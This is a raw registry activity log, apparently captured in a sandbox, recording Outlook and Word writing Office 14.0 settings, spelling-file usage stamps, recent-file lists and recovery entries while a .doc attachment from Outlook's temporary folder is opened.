HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1058

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1058

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1110

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1110

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1069

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1069

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1027

1332215815

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1027

1332215816

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

SpellingAndGrammarFilesExp6_1042

1332215809

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

StemmerFiles_1042

1332215810

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1055

1332215809

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1055

1332215810

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215871

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215872

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215871

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215872

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215908

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215909

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215823

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215824

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing

CFF13DD86EF249EBB265E3BFC6501C1D

01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Search

C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst

3671654

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security

OutlookSecureTempFolder

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\22FMGLEE\

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1332215872

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\IAM

Server ID

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046

000b0340

0100

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents

LastPurgeTime

26220365

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

3wc

33776300540A0000010000000000000000000000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1041

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1046

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1036

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1031

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1040

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1049

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

3082

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1042

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1055

Off

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1033

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1046

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1036

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1031

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1040

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1041

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1049

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

3082

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1042

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

1055

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1332215873

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1332215990

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

ProductFiles

1332215991

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

StemmerFiles_1042

1332215811

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word

FontInfoCacheW

6000000060000000F5FFFFFF000000000000000000000000BC02000000000000004000225400610068006F006D006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0000000B000000020000000200000000000000060000001A000000BC0200000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C0290000000000000001000000000028200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0000000B0000000200000002000000000000000500000017000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C02900000000000000010000000000282006000000F7FFFFFF0000000000000000000000009001000000000000004000225400610068006F006D006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090000000200000002000000000000000400000013000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C02900000000000000010000000000282005000000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word

MTTT

540A0000367C856D3D96D50100000000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

6yc

36796300540A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

ryc

72796300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

c~c

637E6300540A00000600000001000000F600000002000000E60000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C006D006900630072006F0073006F00660074005C00770069006E0064006F00770073005C00740065006D0070006F007200610072007900200069006E007400650072006E00650074002000660069006C00650073005C0063006F006E00740065006E0074002E006F00750074006C006F006F006B005C003200320066006D0067006C00650065005C006E006F0074006900630065005F007A00360033003100350032002E0064006F006300000000000000

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

VBAFiles

1332215815

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1332215881

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1332215882

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Max Display

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Item 1

[F00000000][T01D56F995041B2E0][O00000000]*C:\Users\admin\Documents\

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU

Item 2

[F00000000][T01D56F98784E7EE0][O00000000]*C:\Users\admin\Downloads\

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Max Display

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 1

[F00000000][T01D36A789CD44E00][O00000000]*C:\Users\admin\Desktop\simplesafety.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 2

[F00000000][T01D3954F3AF72100][O00000000]*C:\Users\admin\Desktop\growthjournal.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 3

[F00000000][T01D3A6501AB34C00][O00000000]*C:\Users\admin\Desktop\finalfaq.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 4

[F00000000][T01D53E2B7C660280][O00000000]*C:\Users\admin\Desktop\skillsassociates.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 5

[F00000000][T01D4C94927B7E900][O00000000]*C:\Users\admin\Desktop\fundingtook.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 6

[F00000000][T01D53B779E9C8080][O00000000]*C:\Users\admin\Desktop\dvdoh.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 7

[F00000000][T01D3BD8262AF3D80][O00000000]*C:\Users\admin\Documents\petermetal.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 8

[F00000000][T01D5555DC4D97180][O00000000]*C:\Users\admin\Documents\includesmode.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 9

[F00000000][T01D5665EA4A89B80][O00000000]*C:\Users\admin\Documents\ringphotos.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 10

[F00000000][T01D3CBC702CDE780][O00000000]*C:\Users\admin\Documents\differentmedicine.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

Item 11

[F00000000][T01D2B71AF747AE00][O00000000]*C:\Users\admin\Documents\irelandfurniture.rtf

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\39D53D

39D53D

04000000540A00007200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C004D006900630072006F0073006F00660074005C00570069006E0064006F00770073005C00540065006D0070006F007200610072007900200049006E007400650072006E00650074002000460069006C00650073005C0043006F006E00740065006E0074002E004F00750074006C006F006F006B005C003200320046004D0047004C00450045005C004E004F0054004900430045005F005A00360033003100350032002E0064006F006300110000004E004F0054004900430045005F005A00360033003100350032002E0064006F00630000000000010001000000000034452D6D3D96D5013DD539003DD5390000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF

2644

WINWORD.EXE

delete key

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

{ec

7B656300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

kec

6B656300540A000002000000000000008E00000001000000500000003200000063003A005C00700072006F006700720061007E0031005C006D006900630072006F0073007E0031005C006F0066006600690063006500310034005C00670065006E006B006F002E0064006C006C0000006D006900630072006F0073006F0066007400200077006F00720064002000D0C6E0ACC0C9200094CD00AC200030AEA5B20000

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing

019C826E445A4649A5B00BF08FCC4EEE

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215873

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215874

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215873

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215874

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215910

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215911

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1046

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10061400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1046

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1043

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10031400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1043

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215825

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215826

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1025

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10010400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1025

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1040

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10001400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1040

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1058

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10022400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1058

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10091400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1049

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1110

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10065400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1110

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1069

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100D2400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1069

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1027

1332215817

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10030400000000000F01FEC\Usage

SpellingAndGrammarFilesExp2_1027

1332215818

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

SpellingAndGrammarFilesExp6_1042

1332215810

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10021400000000000F01FEC\Usage

StemmerFiles_1042

1332215812

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1055

1332215811

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100F1400000000000F01FEC\Usage

SpellingAndGrammarFilesExp1_1055

1332215812

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215875

2644

WINWORD.EXE

write

